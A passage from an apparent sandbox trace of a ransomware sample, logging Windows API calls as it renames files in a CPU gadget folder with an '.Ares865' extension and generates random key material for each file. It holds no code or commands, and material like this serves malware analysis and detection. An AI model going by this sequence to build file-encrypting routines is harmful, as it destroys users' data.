sidebar\\gadgets\\cpu.gadget\\icon.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\icon.png.ares865"), dwFlags=0x1) returned 1 [0118.684] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\icon.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.684] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9186) returned 1 [0118.684] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.685] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.685] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.687] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.688] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.688] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.689] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png.Ares865") returned 74 [0118.689] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\logo.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\logo.png.ares865"), dwFlags=0x1) returned 1 [0118.690] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\logo.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.690] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6166) returned 1 [0118.691] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.691] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.691] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.694] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.695] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.695] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.696] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images" [0118.696] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png.Ares865") returned 81 [0118.696] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\back.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\back.png.ares865"), dwFlags=0x1) returned 1 [0118.698] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\back.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.698] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17126) returned 1 [0118.698] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.699] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.699] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.702] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.702] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.702] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.703] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back_lrg.png.Ares865") returned 85 [0118.703] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back_lrg.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\back_lrg.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back_lrg.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\back_lrg.png.ares865"), dwFlags=0x1) returned 1 [0118.704] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back_lrg.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\back_lrg.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.705] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=26193) returned 1 [0118.705] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.705] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.706] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.709] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.709] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.709] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.710] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial.png.Ares865") returned 81 [0118.710] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial.png.ares865"), dwFlags=0x1) returned 1 [0118.712] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.712] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=346) returned 1 [0118.712] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.713] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.713] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.716] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.716] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.716] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.717] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot.png.Ares865") returned 84 [0118.717] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dialdot.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dialdot.png.ares865"), dwFlags=0x1) returned 1 [0118.718] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dialdot.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.718] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3217) returned 1 [0118.719] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.719] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.719] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.721] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.722] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.722] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.723] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot_lrg.png.Ares865") returned 88 [0118.723] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot_lrg.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dialdot_lrg.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot_lrg.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dialdot_lrg.png.ares865"), dwFlags=0x1) returned 1 [0118.724] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot_lrg.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dialdot_lrg.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.724] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4042) returned 1 [0118.725] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.725] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.725] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.728] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.729] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.729] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.729] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg.png.Ares865") returned 85 [0118.729] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_lrg.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_lrg.png.ares865"), dwFlags=0x1) returned 1 [0118.730] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_lrg.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.731] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3081) returned 1 [0118.731] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.732] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.732] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.733] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.734] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.734] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.735] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg_sml.png.Ares865") returned 89 [0118.735] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg_sml.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_lrg_sml.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg_sml.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_lrg_sml.png.ares865"), dwFlags=0x1) returned 1 [0118.737] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg_sml.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_lrg_sml.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.737] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3075) returned 1 [0118.737] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.738] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.738] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.740] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.740] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.741] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.741] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_sml.png.Ares865") returned 85 [0118.741] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_sml.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_sml.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_sml.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_sml.png.ares865"), dwFlags=0x1) returned 1 [0118.742] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_sml.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_sml.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.742] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3026) returned 1 [0118.743] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.743] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.743] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.745] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.746] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.746] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.747] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\glass.png.Ares865") returned 82 [0118.747] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\glass.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\glass.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\glass.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\glass.png.ares865"), dwFlags=0x1) returned 1 [0118.750] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\glass.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\glass.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.750] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=308) returned 1 [0118.750] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.751] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.751] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.753] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.754] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.754] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.755] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\glass_lrg.png.Ares865") returned 86 [0118.755] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\glass_lrg.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\glass_lrg.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\glass_lrg.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\glass_lrg.png.ares865"), dwFlags=0x1) returned 1 [0118.756] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\glass_lrg.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\glass_lrg.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.756] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=443) returned 1 [0118.756] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.757] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.757] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.760] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.761] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.761] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.761] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US" [0118.762] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html.Ares865") returned 80 [0118.762] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\cpu.html"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\cpu.html.ares865"), dwFlags=0x1) returned 1 [0118.763] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\cpu.html.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.763] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4630) returned 1 [0118.763] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.764] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.764] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.774] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.775] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.775] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.776] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js" [0118.776] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\cpu.js.Ares865") returned 81 [0118.776] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\cpu.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\js\\cpu.js"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\cpu.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\js\\cpu.js.ares865"), dwFlags=0x1) returned 1 [0118.778] CreateFileW 